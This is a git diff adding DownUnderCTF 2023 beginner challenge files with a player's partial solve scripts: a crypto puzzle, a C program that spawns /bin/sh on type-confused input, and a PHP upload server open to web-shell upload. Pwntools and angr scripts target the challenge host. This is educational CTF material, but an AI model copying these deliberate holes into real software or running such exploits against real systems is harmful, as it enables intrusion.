downloaded challenges

didnt know they would publish everything

DownUnderCTF 2023/beginner/complementary/ape.py

@@ -0,0 +1,16 @@
+import math
+
+ctf = b"DUCTF{"
+
+ctf = int.from_bytes(ctf)
+
+# 0x44554354467b
+# 0x3bd4fca9d0d3e400000000000000000000000
+# 6954494065942554678316751997792528753841173212407363342283423753536991947310058248515278
+
+crypt = 6954494065942554678316751997792528753841173212407363342283423753536991947310058248515278
+
+print(hex(int(math.sqrt(crypt))))
+ctf2 = 0x44554354467b0000000000000000000000000
+
+print(int(crypt / ctf2))

DownUnderCTF 2023/beginner/complementary/complementary.py

@@ -0,0 +1,14 @@
+import math
+
+flag = open('./flag.txt', 'rb').read().strip()
+m1 = int.from_bytes(flag[:len(flag)//2])
+m2 = int.from_bytes(flag[len(flag)//2:])
+print(flag[:len(flag)//2], flag[len(flag)//2:])
+print(m1, m2)
+print(hex(m1), hex(m2))
+n = m1 * m2
+print(n)
+
+print("SOLVING!")
+sq = int(math.sqrt(n))
+print(hex(sq))

DownUnderCTF 2023/beginner/complementary/flag.txt

@@ -0,0 +1 @@
+DUCTF{NOTAFLAG}

DownUnderCTF 2023/beginner/complementary/output.txt

@@ -0,0 +1 @@
+6954494065942554678316751997792528753841173212407363342283423753536991947310058248515278

DownUnderCTF 2023/beginner/confusing/README.md

@@ -0,0 +1,45 @@
+# confusing
+
+```
+Types can be very confusing.
+
+Author: joseph
+nc 2023.ductf.dev 30024 
+```
+
+## Source 
+
+```c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void init() {
+    setvbuf(stdout, 0, 2, 0);
+    setvbuf(stdin, 0, 2, 0);
+}
+
+int main() {
+    init();
+
+    short d;
+    double f;
+    char s[4];
+    int z; 
+
+    printf("Give me d: ");
+    scanf("%lf", &d);
+
+    printf("Give me s: ");
+    scanf("%d", &s);
+
+    printf("Give me f: ");
+    scanf("%8s", &f);
+
+    if(z == -1 && d == 13337 && f == 1.6180339887 && strncmp(s, "FLAG", 4) == 0) {
+        system("/bin/sh");
+    } else {
+        puts("Still confused?");
+    }
+}
+```

DownUnderCTF 2023/beginner/confusing/ape.py

@@ -0,0 +1,34 @@
+import sys
+import angr
+import claripy
+import time
+
+# compiled on ubuntu 18.04 system:
+# https://github.com/b01lers/b01lers-ctf-2020/tree/master/rev/100_little_engine
+success = 0x0010133c
+fail = 0x00101343
+
+
+def main(argv):
+    path_to_binary = argv[1]  # :string
+    project = angr.Project(path_to_binary)
+
+    # Start in main()
+    initial_state = project.factory.entry_state()
+    # Start simulation
+    simulation = project.factory.simgr(initial_state)
+
+    simulation.explore(find=success, avoid=fail)
+
+    # If found a way to reach the address
+    if simulation.found:
+        solution_state = simulation.found[0]
+
+        # Print the string that Angr wrote to stdin to follow solution_state
+        print(solution_state.posix.dumps(sys.stdin.fileno()))
+    else:
+        raise Exception('Could not find the solution')
+
+
+if __name__ == '__main__':
+    main(sys.argv)

DownUnderCTF 2023/beginner/confusing/confusing.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void init() {
+    setvbuf(stdout, 0, 2, 0);
+    setvbuf(stdin, 0, 2, 0);
+}
+
+int main() {
+    init();
+
+    short d;
+    double f;
+    char s[4];
+    int z; 
+
+    printf("Give me d: ");
+    scanf("%lf", &d);
+
+    printf("Give me s: ");
+    scanf("%d", &s);
+
+    printf("Give me f: ");
+    scanf("%8s", &f);
+
+    if(z == -1 && d == 13337 && f == 1.6180339887 && strncmp(s, "FLAG", 4) == 0) {
+        system("/bin/sh");
+    } else {
+        puts("Still confused?");
+    }
+}

DownUnderCTF 2023/beginner/confusing/confusing.py

@@ -0,0 +1,35 @@
+from pwn import *
+import os
+
+os.environ["PWNLIB_DEBUG"] = "1"
+
+gs = '''
+unset env LINES
+unset env COLUMNS
+set follow-fork-mode child
+# br *main+78 # first scanf
+br *main+160
+br *main+170
+br *main+220
+c
+'''
+
+elf = ELF(os.getcwd()+"/confusing")
+
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gs)
+    if args.REMOTE:
+        return remote("2023.ductf.dev", 30024)
+    else:
+        return process(elf.path)
+
+while True:
+    io = start()
+    print(io.recvuntil(b"Give me d: "))
+    io.sendline(b"7")
+    print(io.recvuntil(b"Give me s: "))
+    io.sendline(b"FLAG")# + b"\xff"*4)
+    print(io.recvuntil(b"Give me f: "))
+    io.sendline(b"2")
+    io.interactive()

DownUnderCTF 2023/beginner/xxd-server/xxd_server/.htaccess

@@ -0,0 +1,4 @@
+# Everything not a PHP file, should be served as text/plain
+<FilesMatch "\.(?!(php)$)([^.]*)$">
+    ForceType text/plain
+</FilesMatch>

DownUnderCTF 2023/beginner/xxd-server/xxd_server/Dockerfile

@@ -0,0 +1,6 @@
+FROM php:8.1-apache
+
+COPY index.php .htaccess /var/www/html/
+COPY flag /
+RUN sed -i 's/AllowOverride None/AllowOverride All/g' /etc/apache2/apache2.conf
+RUN mkdir -p /var/www/html/uploads && chmod 1333 /var/www/html/uploads

DownUnderCTF 2023/beginner/xxd-server/xxd_server/index.php

@@ -0,0 +1,110 @@
+<?php
+
+// Emulate the behavior of command line 'xxd' tool
+function xxd(string $s): string {
+	$out = '';
+	$ctr = 0;
+	foreach (str_split($s, 16) as $v) {
+		$hex_string = implode(' ', str_split(bin2hex($v), 4));
+		$ascii_string = '';
+		foreach (str_split($v) as $c) {
+			$ascii_string .= $c < ' ' || $c > '~' ? '.' : $c;
+		}
+		$out .= sprintf("%08x: %-40s %-16s\n", $ctr, $hex_string, $ascii_string);
+		$ctr += 16;
+	}
+	return $out;
+}
+
+$message = '';
+
+// Is there an upload?
+if (isset($_FILES['file-upload'])) {
+	$upload_dir = 'uploads/' . bin2hex(random_bytes(8));
+	$upload_path = $upload_dir . '/' . basename($_FILES['file-upload']['name']);
+	mkdir($upload_dir);
+	$upload_contents = xxd(file_get_contents($_FILES['file-upload']['tmp_name']));
+	if (file_put_contents($upload_path, $upload_contents)) {
+		$message = 'Your file has been uploaded. Click <a href="' . htmlspecialchars($upload_path) . '">here</a> to view';
+	} else {
+	    $message = 'File upload failed.';
+	}
+}
+
+?>
+<!DOCTYPE html>
+<html>
+<head>
+    <title>xxd-server</title>
+        <style>
+        body {
+            background-color: #fff;
+            color: #000;
+            font-family: Arial, sans-serif;
+            height: 100vh;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+        }
+
+        .container {
+            text-align: center;
+            border: 2px solid #000;
+            padding: 20px;
+            border-radius: 10px;
+        }
+
+        h1 {
+            color: #000;
+        }
+
+        #file-upload {
+            display: none; /* hide the actual input */
+        }
+
+        /* Style the label to look like a button */
+        label[for="file-upload"] {
+            display: inline-block;
+            background-color: #000;
+            color: #fff;
+            padding: 10px 20px;
+            cursor: pointer;
+            transition: background-color 0.3s;
+        }
+
+        label[for="file-upload"]:hover {
+            background-color: #666;
+        }
+
+        #submit-button {
+            margin-top: 20px;
+            background-color: #000;
+            color: #fff;
+            border: none;
+            padding: 10px 20px;
+            cursor: pointer;
+            transition: background-color 0.3s;
+        }
+
+        #submit-button:hover {
+            background-color: #666;
+        }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>xxd-server</h1>
+        <p>Our patented hex technology&trade; allows you to view the binary data of any file. Try it here!</p>
+        <form action="/" method="POST" enctype="multipart/form-data">
+            <input type="file" id="file-upload" name="file-upload">
+            <label for="file-upload">Select File</label>
+            <br>
+            <input type="submit" id="submit-button" value="Upload">
+        </form>
+        <?= $message ? '<p>' . $message . '</p>' : ''; ?>
+    </div>
+</body>
+</html>
+
+
+